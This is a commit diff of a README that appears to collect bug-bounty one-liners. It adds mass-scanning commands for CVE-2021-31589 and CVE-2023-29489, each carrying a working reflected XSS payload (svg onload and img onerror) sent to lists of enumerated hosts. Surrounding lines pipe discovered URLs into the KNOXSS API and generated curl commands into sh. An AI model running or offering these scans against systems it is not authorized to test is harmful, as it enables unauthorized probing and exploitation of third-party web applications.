commit
308a962ad5
12
README.md
12
README.md
|
@ -72,6 +72,18 @@ puredns bruteforce wordlist.txt site.com -r resolvers.txt -w output.txt
|
||||||
echo "domain" | subfinder -silent | gauplus | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss[.]me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIKNOXSS\""}' | sh
|
echo "domain" | subfinder -silent | gauplus | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss[.]me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIKNOXSS\""}' | sh
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### CVE-2021-31589
|
||||||
|
|
||||||
|
```bash
|
||||||
|
cat subs.txt | while read host do; do curl -sk "$host/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password" | grep -qs '"><svg/onload=alert(document.domain)>' && echo "$host: Vuln" || echo "$host: Not Vuln"; done
|
||||||
|
```
|
||||||
|
|
||||||
|
### CVE-2023-29489
|
||||||
|
|
||||||
|
```bash
|
||||||
|
subfinder -d target.com -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path 'cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaa' -mc 400
|
||||||
|
```
|
||||||
|
|
||||||
### Clean list of host, port, and version
|
### Clean list of host, port, and version
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
|
|
Loading…
Reference in New Issue